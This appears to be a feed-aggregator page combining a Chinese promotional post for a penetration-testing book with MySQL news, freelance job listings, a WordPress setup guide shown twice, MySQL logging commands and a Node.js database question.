张子剑 北京理工大学讲师,博士,硕士生导师。曾主持国家自然科学基金1项,重点研发计划子课题1项。参与编写《信息安全技术 可信计算规范 可信连接架构》(GB/T 29828-2013)安全标准,出版外文专著1本,发表SCI/EI检索学术论文30余篇。

作者介绍

陈小兵 高级工程师,51CTO技术专家,北京理工大学在读博士,主要研究方向为网络攻防技术及安全体系建设。出版图书《SQL Server 2000培训教程》《黑客攻防实战案例解析》《Web渗透技术及实战案例解析》《安全之路:Web渗透技术及实战案例解析(第2版)》《黑客攻防:实战加密与解密》,在《黑客防线》《黑客X档案》《网管员世界》《开放系统世界》《视窗世界》等杂志及先知、FreeBuf、51CTO、安全智库等网站发表文章200余篇。

张胜生 信息安全讲师,网络安全专家,研究生导师,现任北京中安国发信息技术研究院院长。翻译《CISSP认证考试指南(第6版)》,主持开发设计中国信息安全认证中心CISAW认证应急服务方向课程体系和实操考试平台,曾获中国信息安全攻防实验室产品实战性和实用性一等奖。

王坤 江苏省电子信息产品质量监督检验研究院(江苏省信息安全测评中心)检测工程师,主要研究方向为风险评估、等级保护、渗透测试、工控系统安全。2007年起接触网络安全,在《黑客防线》《非安全》《黑客X档案》等杂志发表文章数十篇,曾获2013年ISG信息安全技能竞赛个人赛二等奖、2014年“湖湘杯”全国网络信息安全公开赛二等奖等。

徐焱 现任北京交通大学长三角研究院科教发展部部长。2002年起接触网络安全,对Web安全有浓厚的兴趣,擅长Metasploit和内网渗透。出版图书《Web高级渗透实用指南》,在《黑客X档案》《黑客手册》等杂志及FreeBuf、安全客、先知、嘶吼等网站发表了多篇技术文章。

大咖推荐

在安全行业从业这么多年,回过头来发现,和小兵居然相识10年了。作为10年前就对网络安全有浓厚兴趣,在安全圈子里扎根、生长的技术人,小兵的自学能力和分享精神都是我所佩服的。

我一直认为,安全人才没有办法定向培养,只能依赖天赋,而我们要做的就是发掘和激发少部分人的天赋,最好的办法则是通过活生生的案例引发兴趣,让兴趣成为最好的导师。这本书也和小兵的为人一样实在,有大量干货、新货,能帮助刚对安全产生兴趣却不知道从哪里入手的读者快速入门、上手,通过本书捅破那层“窗户纸”,找到自己感兴趣的新领域。阅读本书,你将在网络安全的路上走得更快、更远!

360网络攻防实验室负责人

陆羽(林伟)

在经典的渗透测试过程中,有很多行之有效的漏洞利用及相关场景下的提权思路,这本书对这些内容做了全面的介绍。这本书不仅覆盖攻击,还详细讲解了相应的防御方法,内容皆来自一线实战,值得参考。

《Web前端黑客技术揭秘》作者

余弦

Shadow Brokers发布“NSA武器库”在网络世界所造成的影响,让我们感受到了“渗透之下,漏洞利用工具为王”的可怕。当漏洞利用工具并不完备时,网络渗透测试就无法有效地进行了吗?显然不是这样的。渗透的精髓在于组合与细节利用,在一万种网络系统环境中有一万种渗透思路和方法。这种极具创造性的“入侵”行为体现了渗透测试人员的能力与水平,经验老道的安全人员总有自己独特的“奇淫技巧”,这些技巧就像弹药一样,根据渗透目标的不同有的放矢,以最终获得目标高权限为结果的过程是有趣的且具有艺术性的。我想,这就是渗透测试的魅力所在。当一个安全人员通过别人从未尝试过的“组合拳”最终渗透了目标时,他所收获的成就感是无与伦比的。每个安全人员都对拥有大师级的网络渗透技术梦寐以求,而获得此水平的前提就在于基础一定要扎实,如果现在有一万种渗透技巧存在,那就将它们融会贯通,唯有消化和吸收了所有已知的渗透技巧,才能进一步缔造崭新的攻防手法。

本书是一本渗透技巧极其丰富的工具书,涵盖了渗透测试中绝大部分环境下的攻防利用之道,是初学者打基础、高手查缺补漏的绝佳教材。

360独角兽安全团队创始人

杨卿

文末福利

看到这里,是不是早已经按奈不住心中的激动想要去网上商城购买了,OMG,90.3元,买不起!买不起!

小安现在要告诉你,这可能是你和这本书面对面不花一分钱的完美机会~

活动规则:

直接在下方留言,说出你想要这本书的理由以及你对这本书的看法,15字以上。并转发本篇文章到朋友圈给留言集赞,我们将从文章下方留言处抽选点赞数最高的10粉丝赠送《网络攻防实战研究:漏洞利用与提权》一本!

截止日期 :2018年10月15日16:00

备注:

1.请务必登录之后评论,不要使用游客账号

2.请务必将本篇转发至朋友圈,截图将作为最后领取书籍的必备钥匙

往往最先行动的人总会成功,下方留言等你哦❤


          Fatal error: Uncaught Error: Call to undefined function odbc_connect()      Cache   Translate Page      

Fatal error: Uncaught Error: Call to undefined function odbc_connect()

Respuesta a Fatal error: Uncaught Error: Call to undefined function odbc_connect()

El asunto es que tengo un examen de PHP la semana que viene y necesito hacer uso de todos los modos de conexión posibles a MySQL, jajaja... Los .dll existen, y los volví a descomprimir esta semana a partir del .rar oficial de PHP, por lo que supongo que no están corruptos.

Publicado el 10 de Octubre del 2018 por Optigan

          Timbrado de factura      Cache   Translate Page      

Timbrado de factura

Buen día, soy nuevo en el área de facturación web, me gustaría saber algunas opiniones:

Actualmente hago el timbrado de la factura y guardo los datos generales de ella en mysql, pero de los datos de timbrado solo guardo el UUID por si se pierde el xml poderlo recuperar.
se requiere generar un pdf de la factura:
me recomiendan leer los datos de mysql por medio de consulta o leerlos a partir del XML timbrado para formar el pdf?
Actualmente lo hago del xml junto...

Publicado el 09 de Octubre del 2018 por Alejandro

          The MySQL 8.0.13 Maintenance Release is Generally Available      Cache   Translate Page      
The MySQL Development team is very happy to announce that MySQL 8.0.13, the second 8.0 Maintenance Release, is now available for download at dev.mysql.com. In addition to bug fixes there are a few new features added in this release.  Please download 8.0.13 from dev.mysql.com or from the MySQL  Yum,  APT, or SUSE repositories.…
          FOSDEM 2019      Cache   Translate Page      
The FOSDEM organization just confirmed that again this year the ecosystem of your favorite database will have its Devroom ! More info to come soon, but save the day: 2 & 3rd February 2019 in Brussels ! It seems the MySQL & Friends Devroom  (MariaDB, Percona, Oracle, and all tools in the ecosystem) will be held on Saturday (to be confirmed). Stay tuned !
          Announcement: Second Alpha Build of Percona XtraBackup 8.0 Is Available      Cache   Translate Page      
The second alpha build of Percona XtraBackup 8.0.2 is now available in the Percona experimental software repositories. Note that, due to the new MySQL redo log and data dictionary formats, the Percona XtraBackup 8.0.x versions will only be compatible with MySQL 8.0.x and Percona Server for MySQL 8.0.x. This release supports backing up Percona Server 8.0 Alpha. For experimental migrations from earlier database server versions, you will need to backup and restore and using XtraBackup 2.4 and then use mysql_upgrade from MySQL 8.0.x PXB 8.0.2 alpha is available for the following platforms: RHEL/Centos 6.x RHEL/Centos 7.x Ubuntu 14.04 Trusty* Ubuntu 16.04 Xenial Ubuntu 18.04 Bionic Debian 8 Jessie* Debian 9 Stretch Information on how to configure the Percona repositories for apt and yum systems and access the Percona experimental software is here. * We might drop these platforms before GA release. Improvements PXB-1658: Import keyring vault plugin from Percona Server 8 PXB-1609: Make version_check optional at build time PXB-1626: Support encrypted redo logs PXB-1627: Support obtaining binary log coordinates from performance_schema.log_status Fixed Bugs PXB-1634: The CREATE TABLE statement could fail with the DUPLICATE KEY error PXB-1643: Memory issues reported by ASAN in PXB 8 PXB-1651: Buffer pool dump could create a (null) file during prepare stage of Mysql8.0.12 data PXB-1671: A backup could fail when the MySQL user was not specified PXB-1660: InnoDB: Log block N at lsn M has valid header, but checksum field contains Q, should be P Other bugs fixed: PXB-1623, PXB-1648, PXB-1669, PXB-1639, and PXB-1661. The post Announcement: Second Alpha Build of Percona XtraBackup 8.0 Is Available appeared first on Percona Database Performance Blog.
          Re: MySQL upgrade issue (mysql_upgrade fails)      Cache   Translate Page      
I have the same issue, upgraded to 5.7.23 using AWS Console
          Bitcoin fork - Upwork      Cache   Translate Page      
I need bitcoin forked and start at my server centralized blockchain with PoT or PoS to make bitcoin transfers free of charge and wallets generation unlimited for users of the blockchain. While outgoing and ingoing to other bitcoin network payments will cost some Gas if I ma not mistaken it is 21000 gas per payment now. This blockchain must have some API to build frontend and backend on php, mysql.
I need rough evaluation of time and money required to have it done and list of questions I must answer to launch this project.


Posted On: October 10, 2018 15:41 UTC
Category: Web, Mobile & Software Dev > Other - Software Development
Country: Lithuania
click to apply
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          App Developer - TeamLinkt (QuickLinkt) - Saskatoon, SK      Cache   Translate Page      
Experience with Web &amp; Server-side development is a plus (jQuery, MVC, PHP, MySql). Are you an experienced hands-on iOS and Android developer and love what you...
From Indeed - Wed, 26 Sep 2018 20:53:30 GMT - View all Saskatoon, SK jobs
          Web Developer - New Roots Herbal - Tessier, SK      Cache   Translate Page      
Strong experience with PHP, MySQL, HTML 5, CSS 3, JavaScript, jQuery, Laravel, Drupal, Joomla; New Roots Herbal is a leading national manufacturer and...
From New Roots Herbal - Tue, 17 Jul 2018 23:03:24 GMT - View all Tessier, SK jobs
          The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site      Cache   Translate Page      

So you've decided to run a WordPress site but have no idea where to start? This tutorial is aimed at absolute beginners. Some IT knowledge will help but I presume you want to learn the essentials within a few hours. Let's get started.

Step 1: What Do You Want to Achieve?

A little planning goes a long way. Be honest with yourself: why are you considering WordPress? Do you want to:

  • create a business website?
  • document your life, hobby or interests?
  • start an amazing web design agency?
  • learn to write code?
  • do something else?

WordPress is flexible and runs almost a third of the web — but it's not ideal for every situation. A website or article library is perfect. Creating a social network or online shop is possible but there may be better options. Using WordPress to learn PHP could be a frustrating experience.

Presuming WordPress is appropriate, are you interested in the technicalities or would you simply prefer to write content? If it's the latter, a managed WordPress plan from SiteGround or an account at WordPress.com will get you running without the hassles of installation and server management.

The moral: define the problem before choosing a solution!

Step 2: Plan Your Content

Ideally, you should have all your content written before building a site. It's the best way to plan a structure and will influence your design. No one ever does that, but at least plan a few general concepts so you have somewhere to start.

Step 3: Purchase a Domain Name

A domain name is your primary web address, e.g. www.mysite.com. Keep it short and use keywords appropriate to your content. This can be tougher than it sounds; most good names were registered years ago.

Use a reputable domain registrar. Prices vary across countries and top-level-domain types (.com, .net, .org, .ninja etc), but expect to pay around $25 for a new domain for a couple of years. Buying a decent pre-registered domain from someone else can be considerably more expensive.

Step 4: Purchase a Hosting Plan

Your site needs to be hosted somewhere. Its files must be placed on a device which understands how to deal with web requests: a web server. You could serve everything from your desktop PC but it quickly becomes impractical.

Buy a suitable plan from a respected host such as SiteGround. A WordPress-compatible shared hosting plan costs a few dollars a month and you can upgrade disk space and bandwidth as traffic grows.

You will then need to 'point' your domain at your new web space. This is normally done by logging into your domain registrar's control panel then either:

  1. Setting the host as the DNS nameserver, or
  2. Changing the domain's DNS A records to point at the host's IP address.

All hosts and domain registrars provide guidance but you may need to seek expert assistance. Domain changes can take up to 48 hours to propagate so you may need to wait before moving to the next step.

Step 5: Set Up SSL

Secure Socket Layer (SSL) certificates enable cryptographic protocols on your website so it is served over an https:// address rather than http://. All communication between your server and the user's browser is encrypted so it cannot be (easily) intercepted by a third party.

Configuring SSL is an optional step but highly recommended:

  1. Browsers warn when a site is not secure especially when completing forms or sending data.
  2. Search engines rank secure sites higher than non-secure equivalents.
  3. SSL is essential if you eventually want a Progressive Web App which allows your site to be "installed" and work offline.
  4. Adding SSL later is considerably more difficult. You may need to reinstall WordPress and search engine indexing can be affected.
  5. There are no disadvantages. HTTPS can be added for free and is negligibly slower than unencrypted HTTP (it can be considerably faster when used with HTTP/2).

Hosts often allow you to install a certificate purchased elsewhere, but it's easier to use their own service. For example, SiteGround provides a free Let's Encrypt option in the security section of your site's cPanel. Click that, hit Install and SSL is enabled.

enable SSL

Step 6: Install WordPress

WordPress is a complex application which requires:

  1. A back-end MySQL database where your configuration, posts, comments and other information is retained. This must be installed and configured first. A database user ID and password must be defined so applications can store and retrieve data.
  2. A large set of PHP files which form the WordPress application. These must be copied to the server prior to running a set-up procedure. This requests the database credentials before creating the database tables and initial data.
  3. After installation, WordPress communicates with the database using the ID and password to enable editing and presentation of pages.

The majority of hosts provide cPanel - a popular website management facility. You can create your database, upload WordPress and install manually. For full instructions, refer to How to Create WordPress MySQL Databases on cPanel.

Fortunately, there is an easier option. Search or browse for the WordPress options in cPanel:

Install WordPress via cPanel

Click the WordPress Installer to open the installation panel:

WordPress installation options

Define the following settings:

  • https:// for the protocol if you enabled SSL in step 5. (You can also choose whether the domain uses the initial 'www' or not).
  • Your primary domain. (There will only be one choice unless you have multiple domains pointed at the hosting plan).
  • The directory should be left blank to install WordPress in the root folder. Only change this if you want to run it from another folder, e.g. https://mysite.com/blog/
  • The name and description of your new site.
  • Keep Multisite unchecked unless you're intending to run more than one WordPress site on the same space.
  • Enter an Admin Username and Password. You will use these to log into WordPress so ensure they're strong (NOT 'admin' and 'password'!) and you keep them in a safe place.
  • Enter your Email. WordPress uses this to send you notifications when necessary.

The other options can normally be left as the default settings. Hit Install and wait a few minutes for the installation process to complete. You will be given a link to the main site (https://mysite.com/) and the WordPress control panel (https://mysite.com/wp-admin) where you can log in with your administrative username and password.

Step 7: Initial WordPress Configuration

Don't be tempted to start publishing content just yet! It's best to configure WordPress from the Settings menu before going further:

WordPress settings

The following sections describe the basic WordPress settings but note that installed themes and plugins can override these options.

General

This pane allows you to change various aspects about your installation. The primary settings to change include:

  • The Timezone. This may default to UTC so choose an appropriate city instead.
  • The Date Format. Choose an appropriate option or enter a custom string using PHP's date format
  • The Time Format. Similarly, choose an option or enter your own.

Remember to hit Save Changes once finished.

Writing

The main settings to change in this pane are:

  • The Default Post Category. Post categories are defined in Posts > Categories.
  • The Default Post Format. WordPress themes often provide different post types such as standard articles, galleries and video pages. Choose whichever you will use most often.

Reading

The Front page displays setting allows you to set whether your latest posts or a static page is presented on the home page.

The other default settings are normally fine, although you may want to temporarily disable Search Engine Visibility during the initial stages of building your site. Don't forget to enable it before going live!

Discussion

This pane controls commenting. The main setting is Allow people to post comments on new articles which you may want to disable if you don't require comments.

The post The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site appeared first on SitePoint.


          ionic firebase push notificatio       Cache   Translate Page      
need ionic developer i have an app which is connected with php and mysql . in the app there is admin and users. i implement ionic firebase push notification in the app . and its work fine but know i want when the admin click on message it hase 2 fiels title and message ... (Budget: $10 - $30 USD, Jobs: Android, Mobile App Development)
          Copying a site without access to the MySQL export      Cache   Translate Page      
According to https://www.wpexplorer.com/migrating-wordpress-website/ and in order to migrate a WP website to another host, one needs to export the WP MySQL database. What I have is a “complete” (7 GB) backup of the files from my site. However, the old service provider is now closed and I don’t have access to it any more. So […]
          Remote Senior Web Application Full Stack Developer      Cache   Translate Page      
A technology company is filling a position for a Remote Senior Web Application Full Stack Developer. Individual must be able to fulfill the following responsibilities: Architect and implement the next generation of products Implement front and back-end web application Develop API, and create workflows and toolchains for a new product line Position Requirements Include: Have 4+ years experience in full stack web development Proficiency in HTML5, CSS, Javascript, jQuery, React/Redux or Angular Proficiency in NodeJS, MySQL, Amazon SQS Familiar with enterprise application infrastructure and security requirements Ablility to write clean and maintainable code in a team environment Familiar with ReactJS, Vue, or other Javascript frameworks
          PHP + Macros + Xampp. Need a script which buys items automatically whenever they are uploaded to a website list      Cache   Translate Page      
Are you familiar with PHP, Macros, XAMPP? I need a script or setup which buys my selected items from my selected web store. Buying items is easy, just need to find the right column in a website. will... (Budget: £20 - £250 GBP, Jobs: HTML, MySQL, PHP, Software Architecture, Web Scraping)
          Quality Engineer - WorkMarket - Toronto, ON      Cache   Translate Page      
AWS, Consul, Nomad, TerraForm, Vault, Salt, MySQL/RDS. 129 Spadina Avenue Suite 400, Toronto, ON M5V 2L3....
From WorkMarket - Sat, 29 Sep 2018 06:21:19 GMT - View all Toronto, ON jobs
          I can't see the emails when receive questions!      Cache   Translate Page      
I want a script or something to help me with my problem! I can't see the emails when I receive questions! Can you help me see people's emails? Thanks (Budget: $250 - $750 USD, Jobs: Javascript, MySQL, PHP, Python, Software Architecture)
          Need Bot Developer      Cache   Translate Page      
I am looking for a specialty 'event' bot for my server. What I would like this bot to be capable of is giving a user who runs its command (i.e. !event) a random role from a list of holiday roles. So essentially... (Budget: $30 - $250 USD, Jobs: Google Chrome, Javascript, MySQL, PHP, Software Architecture)
          Web Developer for new website      Cache   Translate Page      
I am looking for a web developer to help build a new website. I need account login functionality with additional features. (Budget: $1500 - $3000 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Redesign car rental reservations system.      Cache   Translate Page      
We have a current car rental reservation system made in custom php and we need to do some modifications to the back-end. Need to convert all pages to responsive and also add some new features to the back end... (Budget: $750 - $1500 USD, Jobs: AJAX, HTML, MySQL, PHP, Website Design)
          Updated LimeSurvey to 3.15.0+      Cache   Translate Page      
LimeSurvey (ID : 60) package has been updated to version 3.15.0+. LimeSurvey (formerly PHPSurveyor) is an open source online survey application written in PHP based on a MySQL, PostgreSQL or MSSQL database. It enables users without coding knowledge to develop, publish and collect responses to surveys. Surveys can include branching, custom preferred layout and design … Continue reading "Updated LimeSurvey to 3.15.0+"
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MySQL log queries      Cache   Translate Page      
## General query log: records established client connections and executed statements
## Slow query log: records all queries whose execution time exceeds long_query_time, as well as queries that do not use an index
## Check the database version
SHOW VARIABLES LIKE '%version%';
## Check the general query log settings
SHOW VARIABLES LIKE '%general%';
## Enable the general query log
SET GLOBAL general_log=ON;
## Disable the general query log
SET GLOBAL general_log=OFF;
## Check the current log output format: FILE (stored as hostname.log in the database data directory) or TABLE (stored in the mysql.general_log table)
SHOW VARIABLES LIKE '%log_output%';
## Set the log output to file
SET GLOBAL log_output='file';
## Set the file where the slow query log is saved
SET GLOBAL slow_query_log_file="/var/lib/mysql/localhost-slow.log";
## Check slow-query-related settings
SHOW VARIABLES LIKE '%slow_query%';
## Set the slow query threshold to 1 second (default is 10)
SET GLOBAL long_query_time=1;
## Set the slow query threshold back to 10 seconds (the default)
SET GLOBAL long_query_time=10;
## Check the slow query threshold
SHOW GLOBAL VARIABLES LIKE '%long_query_time%';
## Check how many slow queries there have been
SHOW GLOBAL STATUS LIKE '%Slow_queries%';
## Sleep for 11 seconds to test the slow query log
##select SLEEP(11);


筱筱 posted a comment, 2018-10-09 16:59

          project for Govind      Cache   Translate Page      
Need to update an online portal as discussed. (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Lodge and restaurant software      Cache   Translate Page      
Looking for restaurant and lodge billing software that works over the internet or in backup mode. If you can provide an app, that also helps. (Budget: $30 - $250 USD, Jobs: Android, Excel, MySQL, PHP)
          Software Developer - Autodata Solutions - Calgary, AB      Cache   Translate Page      
PHP / XML / other scripting languages. Develop database-driven websites and web video products using PHP, HTML5, CSS3, JavaScript/jQuery, XML, LAMP, MySQL,...
From Autodata Solutions - Wed, 19 Sep 2018 19:43:16 GMT - View all Calgary, AB jobs
          SoftoRooM -> Exportizer Pro 7.0.2      Cache   Translate Page      
PRYANIK:
Your software forum: SoftoRooM

Exportizer Pro 7.0.2 + crack (patch)


Quote (Exportizer Pro 7.0.2):
    Improvements in interface when working with MySQL, PostgreSQL, SQLite and SQL Server databases.
    Minor changes.


"Medicine" (crack) included
Hidden text!
Details on the forum...

Exportizer Pro 7.0.2
source: www.softoroom.net

          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Software Build Engineer - Leidos - Cheyenne, WY      Cache   Translate Page      
G., Oracle, MySQL, PostgreSQL, SQL Server, etc.). Our Company is a science and technology solutions leader built on a legacy of daring innovation and...
From Leidos - Thu, 27 Sep 2018 17:32:16 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Interface with stakeholders and end users to clarify requirements and complete software...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site      Cache   Translate Page      

So you've decided to run a WordPress site but have no idea where to start? This tutorial is aimed at absolute beginners. Some IT knowledge will help but I presume you want to learn the essentials within a few hours. Let's get started.

Step 1: What Do You Want to Achieve?

A little planning goes a long way. Be honest with yourself: why are you considering WordPress? Do you want to:

  • create a business website?
  • document your life, hobby or interests?
  • start an amazing web design agency?
  • learn to write code?
  • do something else?

WordPress is flexible and runs almost a third of the web — but it's not ideal for every situation. A website or article library is perfect. Creating a social network or online shop is possible but there may be better options. Using WordPress to learn PHP could be a frustrating experience.

Presuming WordPress is appropriate, are you interested in the technicalities or would you simply prefer to write content? If it's the latter, a managed WordPress plan from SiteGround or an account at WordPress.com will get you running without the hassles of installation and server management.

The moral: define the problem before choosing a solution!

Step 2: Plan Your Content

Ideally, you should have all your content written before building a site. It's the best way to plan a structure and will influence your design. No one ever does that, but at least plan a few general concepts so you have somewhere to start.

Step 3: Purchase a Domain Name

A domain name is your primary web address, e.g. www.mysite.com. Keep it short and use keywords appropriate to your content. This can be tougher than it sounds; most good names were registered years ago.

Use a reputable domain registrar. Prices vary across countries and top-level domain types (.com, .net, .org, .ninja, etc.), but expect to pay around $25 to register a new domain for a couple of years. Buying a decent pre-registered domain from someone else can be considerably more expensive.

Step 4: Purchase a Hosting Plan

Your site needs to be hosted somewhere. Its files must be placed on a device which understands how to deal with web requests: a web server. You could serve everything from your desktop PC but it quickly becomes impractical.

Buy a suitable plan from a respected host such as SiteGround. A WordPress-compatible shared hosting plan costs a few dollars a month and you can upgrade disk space and bandwidth as traffic grows.

You will then need to 'point' your domain at your new web space. This is normally done by logging into your domain registrar's control panel then either:

  1. Setting the host as the DNS nameserver, or
  2. Changing the domain's DNS A records to point at the host's IP address.

All hosts and domain registrars provide guidance but you may need to seek expert assistance. Domain changes can take up to 48 hours to propagate so you may need to wait before moving to the next step.
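To illustrate option 2 (every name and the IP address below are hypothetical — substitute the values your host gives you), the records you edit at the registrar look roughly like this in a DNS zone:

```
; Hypothetical zone records pointing the domain at the host's IP
mysite.com.      3600  IN  A      203.0.113.10
www.mysite.com.  3600  IN  CNAME  mysite.com.
```

Option 1 instead replaces the domain's nameserver entries with the ones your host supplies, so the host manages every record for you.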

Step 5: Set Up SSL

Secure Sockets Layer (SSL) certificates enable cryptographic protocols on your website so it is served over an https:// address rather than http://. All communication between your server and the user's browser is encrypted, so it cannot be (easily) intercepted by a third party.

Configuring SSL is an optional step but highly recommended:

  1. Browsers warn when a site is not secure, especially when completing forms or sending data.
  2. Search engines rank secure sites higher than non-secure equivalents.
  3. SSL is essential if you eventually want a Progressive Web App which allows your site to be "installed" and work offline.
  4. Adding SSL later is considerably more difficult. You may need to reinstall WordPress and search engine indexing can be affected.
  5. There are no disadvantages. HTTPS can be added for free and is negligibly slower than unencrypted HTTP (it can be considerably faster when used with HTTP/2).

Hosts often allow you to install a certificate purchased elsewhere, but it's easier to use their own service. For example, SiteGround provides a free Let's Encrypt option in the security section of your site's cPanel. Click that, hit Install and SSL is enabled.

enable SSL

Step 6: Install WordPress

WordPress is a complex application which requires:

  1. A back-end MySQL database where your configuration, posts, comments and other information is retained. This must be installed and configured first. A database user ID and password must be defined so applications can store and retrieve data.
  2. A large set of PHP files which form the WordPress application. These must be copied to the server prior to running a set-up procedure. This requests the database credentials before creating the database tables and initial data.
  3. After installation, WordPress communicates with the database using the ID and password to enable editing and presentation of pages.

The majority of hosts provide cPanel - a popular website management facility. You can create your database, upload WordPress and install manually. For full instructions, refer to How to Create WordPress MySQL Databases on cPanel.
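For reference, the manual route amounts to a handful of statements like these (the database name, user and password are placeholders — WordPress's set-up procedure will ask you for them later):

```sql
-- Hypothetical credentials: substitute your own
CREATE DATABASE wp_mysite;
CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'a-strong-password';
GRANT ALL PRIVILEGES ON wp_mysite.* TO 'wp_user'@'localhost';
FLUSH PRIVILEGES;
```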

Fortunately, there is an easier option. Search or browse for the WordPress options in cPanel:

Install WordPress via cPanel

Click the WordPress Installer to open the installation panel:

WordPress installation options

Define the following settings:

  • https:// for the protocol if you enabled SSL in step 5. (You can also choose whether the domain uses the initial 'www' or not).
  • Your primary domain. (There will only be one choice unless you have multiple domains pointed at the hosting plan).
  • The directory should be left blank to install WordPress in the root folder. Only change this if you want to run it from another folder, e.g. https://mysite.com/blog/
  • The name and description of your new site.
  • Keep Multisite unchecked unless you're intending to run more than one WordPress site on the same space.
  • Enter an Admin Username and Password. You will use these to log into WordPress so ensure they're strong (NOT 'admin' and 'password'!) and you keep them in a safe place.
  • Enter your Email. WordPress uses this to send you notifications when necessary.

The other options can normally be left as the default settings. Hit Install and wait a few minutes for the installation process to complete. You will be given a link to the main site (https://mysite.com/) and the WordPress control panel (https://mysite.com/wp-admin) where you can log in with your administrative username and password.

Step 7: Initial WordPress Configuration

Don't be tempted to start publishing content just yet! It's best to configure WordPress from the Settings menu before going further:

WordPress settings

The following sections describe the basic WordPress settings but note that installed themes and plugins can override these options.

General

This pane allows you to change various aspects about your installation. The primary settings to change include:

  • The Timezone. This may default to UTC so choose an appropriate city instead.
  • The Date Format. Choose an appropriate option or enter a custom string using PHP's date format
  • The Time Format. Similarly, choose an option or enter your own.

Remember to hit Save Changes once finished.

Writing

The main settings to change in this pane are:

  • The Default Post Category. Post categories are defined in Posts > Categories.
  • The Default Post Format. WordPress themes often provide different post types such as standard articles, galleries and video pages. Choose whichever you will use most often.

Reading

The Front page displays setting allows you to set whether your latest posts or a static page is presented on the home page.

The other default settings are normally fine, although you may want to temporarily disable Search Engine Visibility during the initial stages of building your site. Don't forget to enable it before going live!

Discussion

This pane controls commenting. The main setting is Allow people to post comments on new articles which you may want to disable if you don't require comments.

The post The Ultimate Beginner’s Guide to Setting Up & Running a WordPress Site appeared first on SitePoint.


          change my website      Cache   Translate Page      
Hello, I need my site to be changed so that it is a .php file. I also need a settings file that allows me to change the name of the company, the address, the phone number, the email address and also the... (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Need a Php Developer      Cache   Translate Page      
I need a PHP developer with skills who can start ASAP and finish the work in a few minutes. I just need to remove social icons from pages. One more thing: you will have to work on my system using TeamViewer. If you cannot work under these conditions, do not contact me or place bids... (Budget: ₹600 - ₹1000 INR, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          Systems Engineer - Ameriinfo, Inc. - Martinsburg, WV      Cache   Translate Page      
Databases (Microsoft SQL, MySQL, Postgres, MongoDB, etc.). Please see the job details below and let me know if you would be interested in this role....
From Indeed - Thu, 04 Oct 2018 21:41:44 GMT - View all Martinsburg, WV jobs
          Virtualization - Hyper-V and VMWare Engineer - Rekruiters - Martinsburg, WV      Cache   Translate Page      
O Databases (Microsoft SQL, MySQL, Postgres, MongoDB, etc.). Systems Engineer provides technical support in system architecture, system design, system...
From Rekruiters - Tue, 09 Oct 2018 00:36:32 GMT - View all Martinsburg, WV jobs
          VueJs-Mid Level Developer - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Wed, 29 Aug 2018 19:17:59 GMT - View all Huntington, WV jobs
          NodeJs-Mid Level Developer - Core10 - Huntington, WV      Cache   Translate Page      
Experience with other database technologies (postgresql, mysql, mssql, mongodb). The Mid Developer is responsible for working as part of a collaborative...
From Core10 - Wed, 29 Aug 2018 19:17:59 GMT - View all Huntington, WV jobs
          Sr Database Administrator - KOHLS - Menomonee Falls, WI      Cache   Translate Page      
Golden Gate MySql 5.7 MongoDB. Sr Database Administrator POSITION OBJECTIVE Plans and executes the design, development, implementation, integration and support...
From Kohl's - Thu, 04 Oct 2018 23:09:17 GMT - View all Menomonee Falls, WI jobs
          Summer Intern Developers - Back End - Avid Ratings - Madison, WI      Cache   Translate Page      
MySQL, MongoDB, Cassandra, Redis, etc…). The right candidate should cherish experimentation and exploration with new technologies, while at the same time...
From Avid Ratings - Fri, 05 Oct 2018 00:14:43 GMT - View all Madison, WI jobs
          Java Developer - Fetch Rewards - Madison, WI      Cache   Translate Page      
Working with MongoDB and MySQL (or other relational database). _Fetch is a Madison, Wisconsin-based technology company located in the heart of downtown Madison....
From Indeed - Mon, 24 Sep 2018 18:47:45 GMT - View all Madison, WI jobs
          Access multiple tables at once Mysql Nodejs      Cache   Translate Page      

I am trying to assemble a structured array from two tables. The first table's select query fetches the ID from each result row and passes it to the next query. Here is my code:

var query = db.query('select * from orderdish'),
    users = [];

query
  .on('error', function(err) {
    console.log(err);
    updateSockets(err);
  })
  .on('result', function(order, callback) {
    order.abc = '11';
    order.OrderKOT = [];
    var queryOrderKOT = db.query(
      'select * from tblorderkot where order_Id=' + order.order_Id,
      function() {
        kotOrders = [];
        queryOrderKOT
          .on('error', function(err) {
            console.log(err);
            updateSocket(err);
          })
          .on('result', function(orderKOT) {
            kotOrders.push(orderKOT);
          })
          .on('end', function() {
            console.log(kotOrders);
            order.OrderKOT.push(kotOrders);
          });
      });
    console.log(order);
    users.push(order);
    /* aa(function(){ }); */
  })
  .on('end', function() {
